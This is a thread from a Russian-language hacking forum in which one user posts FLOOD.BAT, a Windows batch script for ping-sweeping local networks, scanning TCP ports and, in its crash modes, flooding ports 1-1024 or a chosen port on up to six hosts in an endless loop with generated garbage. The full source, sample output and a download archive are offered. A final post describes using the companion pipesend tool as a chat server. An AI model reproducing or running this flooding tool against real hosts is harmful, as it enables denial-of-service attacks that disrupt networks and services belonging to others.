Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Пятница, 02.08.2024, 12:10
|
|
Статус: нет меня
|
|
|
Talomir
|
#417 | Пятница, 02.08.2024, 18:19
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
ЕЩЁ РАЗ УЛУЧШЕННЫЙ СКАННЕР НЮКЕР ФАЗЕР ФЛУДЕР ПОРТОВ
Ещё раз улучшенный фаззер портов, в этом улучшении обновлён компонент pipesend.exe и улучшен вывод на экран. Привожу примеры и исходники, архив со скриптом и бинарниками закачаю для скачивания немного позже.
Код FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port USAGE: flood --scan 192.168.1 find hosts on local net and shows their names and IP addresses flood --scan2 192.168 find hosts on local net level 2 and shows their names and IP addresses flood --scanports 192.168.1.1 scan open root ports on given host flood --scanallports 192.168.1.1 scan all open ports on given host flood --crash 192.168.1.187 flood with supplied phrase.exe generator (no and -a options of generator) flood --crash 192.168.1.187 my_gen.exe flood with user's my_gen.exe trash generator flood --crashport 192.168.1.187 80 flood port with supplied phrase.exe generator (no and -a options of generator) flood --crashport 192.168.1.187 80 my.exe flood port with user's my.exe generator
Код flood --scan 192.168.1
Сервер: router.asus.com Address: 192.168.1.1
Имя: router.asus.com Address: 192.168.1.1
Сервер: router.asus.com Address: 192.168.1.1
Имя: WIN-J2G446M9P30 Address: 192.168.1.63
Сервер: router.asus.com Address: 192.168.1.1
Сервер: router.asus.com Address: 192.168.1.1
Имя: Vladimirs-MBP Address: 192.168.1.241
Код flood --scan2 192.168
Сервер: router.asus.com Address: 192.168.1.1
Имя: router.asus.com Address: 192.168.1.1
Сервер: router.asus.com Address: 192.168.1.1
Имя: WIN-J2G446M9P30 Address: 192.168.1.63
Сервер: router.asus.com Address: 192.168.1.1
Сервер: router.asus.com Address: 192.168.1.1
Имя: Vladimirs-MBP Address: 192.168.1.241
Сервер: router.asus.com Address: 192.168.1.1
Код flood --scanports www.youtube.com
80 open tcp 443 open tcp
Код @echo off
if "%1" == "--scan" goto Scan if "%1" == "--scan2" goto Scan2 if "%1" == "--scanports" goto Scanports if "%1" == "--scanallports" goto Scanallports if "%1" == "--crash" goto Crash if "%1" == "--crashport" goto Crashport
echo FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port echo USAGE: echo flood --scan 192.168.1 find hosts on local net and shows their names and IP addresses echo flood --scan2 192.168 find hosts on local net level 2 and shows their names and IP addresses echo flood --scanports 192.168.1.1 scan open root ports on given host echo flood --scanallports 192.168.1.1 scan all open ports on given host echo flood --crash 192.168.1.187 flood with supplied phrase.exe generator (no and -a options of generator) echo flood --crash 192.168.1.187 my_gen.exe flood with user's my_gen.exe trash generator echo flood --crashport 192.168.1.187 80 flood port with supplied phrase.exe generator (no and -a options of generator) echo flood --crashport 192.168.1.187 80 my.exe flood port with user's my.exe generator
goto exit_me
:Crash
for /L %%P in (1,1,1024) do (
echo Pong %2 %%P TCP unicode if "%3" == "" (cmd /C phrase.exe|pipesend %2 %%P) else (cmd /C %3|pipesend %2 %%P)
echo Pong %2 %%P TCP ascii if "%3" == "" (cmd /C phrase.exe -a|pipesend %2 %%P) else (cmd /C %3 -a|pipesend %2 %%P) )
goto Crash
:Crashport
echo Pong %2 %3 TCP unicode if "%4" == "" (cmd /C phrase.exe|pipesend %2 %3) else (cmd /C %4|pipesend %2 %3)
echo Pong %2 %3 TCP ascii if "%4" == "" (cmd /C phrase.exe -a|pipesend %2 %3) else (cmd /C %4 -a|pipesend %2 %3)
goto Crashport
:Scan for /L %%Q in (0,1,255) do ( ping -n 1 -w 20 %2.%%Q | find "TTL" >_1_%2%%Q if not errorlevel 1 nslookup %2.%%Q del _1_%2%%Q ) goto exit_me
:Scan2 for /L %%Q in (0,1,255) do ( for /L %%R in (0,1,255) do ( ping -n 1 -w 20 %2.%%Q.%%R | find "TTL" >_1_%2.%%Q%%R if not errorlevel 1 nslookup %2.%%Q.%%R del _1_%2.%%Q%%R ) ) goto exit_me
:Scanports for /L %%Q in (1,1,1024) do ( echo GET|pipesend %2 %%Q | find "ok" >_1_%2%%Q if not errorlevel 1 echo %%Q open tcp del _1_%2%%Q ) goto exit_me
:Scanallports for /L %%Q in (1,1,65535) do ( echo GET|pipesend %2 %%Q | find "ok" >_1_%2.%%Q if not errorlevel 1 echo %%Q open tcp del _1_%2.%%Q ) goto exit_me :exit_me
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Пятница, 02.08.2024, 18:42
|
|
Статус: нет меня
|
|
|
Talomir
|
#418 | Пятница, 02.08.2024, 20:03
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
CКАЧАТЬ ФЛУДЕР ПОРТОВ FLOOD.BAT И ГРУППОВОЙ ЧАТ PIPESEND
hack-13-pipesend-flood.7z
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Воскресенье, 04.08.2024, 14:53
|
|
Статус: нет меня
|
|
|
Talomir
|
#419 | Суббота, 03.08.2024, 10:02
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
ОБНОВИЛ РАЗДАЧУ ФЛУДЕРА
Это обновление улучшает юзабилити скрипта flood.bat
FLOOD.BAT: flood host with generator's garbage to ports 1-1024 or a given port USAGE: flood --ping 192.168.1 find hosts on local net and shows their names and IP addresses flood --ping2 192.168 find hosts on local net level 2 and shows their names and IP addresses flood --scan host scan open root tcp ports on given host flood --scanall host scan all open tcp ports on given host flood --crashport phrase.exe 80 host1... host6 flood port 80 on set of hosts with fuzzer phrase.exe flood --crashall phrase.exe host1... host6 flood ports 1-1024 with phrase.exe generator
Теперь в режимах крэша порта и крэша портов рута 1-1024 можно указывать сразу до 6 хостов на запуск, все они будут крэшися одним окном. Это сокращает и набор на клавиатуре и неразбериху с окнами на экране.
Режим сканирования хостов сети теперь называется --ping и --ping2.
Режимы сканирования портов так и называются --scan для первых 1-1024 и --scanall для всех портов 1-65535. Ссылка на скачивание в предыдущем посту обновлена.
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Суббота, 03.08.2024, 10:02
|
|
Статус: нет меня
|
|
|
Talomir
|
#420 | Суббота, 03.08.2024, 13:19
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
ШИФРОВАННЫЕ МЕЖДУНАРОВНЫЕ ПЕРЕГОВОРЫ ДО 3 ЕВРО В МЕСЯЦ TUTORIAL
Арендуете линукс-дедик за 7 евро в месяц, наример в deltahost.ua
Ставите mono-complete через apt для запуска программ на C#
Заускаете pipesend на порту 7777 интерфейса 127.0.0.1
Заводите пользователей с надёжными паролями и ложите им в home утилиту pipesend (или прописываете путь к pipesend в PATH)
Всё, пользователи могут заходить через putty на сервер и общаться в общей комнате на порту 7777. Трафик до сервера при этом шифруется по открытому ключу OpenSSL, а локальный трафик localhost-чата не выходит за пределы оперативной памяти сервера, то есть переговоры получаются супер-надёжными, шированными.
На одном линукс-сервере можно запустить несколько pipesend, на разных портах, на интерфейсах localhost и внешнем, сделав множество чат-румов. На localhost-е - для общения с шифрованием, разные группы, на внешнем ip - для чат-румов без шифрования с Windows машин, общих чат-румов. Доступ к румам с шифрованием админ может контролировать паролями пользователей (например, пользователи могут скидываться на аренду дедика).
Общая стоимость аренды линукса в реальным ip, 7 евро, делится на количество пользователей в руме, не надо платить каждому как за телефон с Android. Так, если пользователей всего 2, то шифрованная связь обходится в 3.5 евро в месяц, а если пользователей около 7, например - программерская группа, то шифрованная связь будет обходиться всего в 1 евро в месяц, то есть в 10 раз дешевле телефона, и это - междунаровдная связь с шифрованием и без отслеживания!
Также, можно запилить коммерческий сервис шифрованных переговоров, арендовав дедик и беря с пользователей абонплату за шифрованное общение на сервере. При это бесплатные переговоры с Windows на публичном ip будут хорошей рекламой серверу.
Более подробно о pipesend можно прочитать в постах выше, там же скачать эту замечательную утилиту
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
|
Статус: нет меня
|
|
|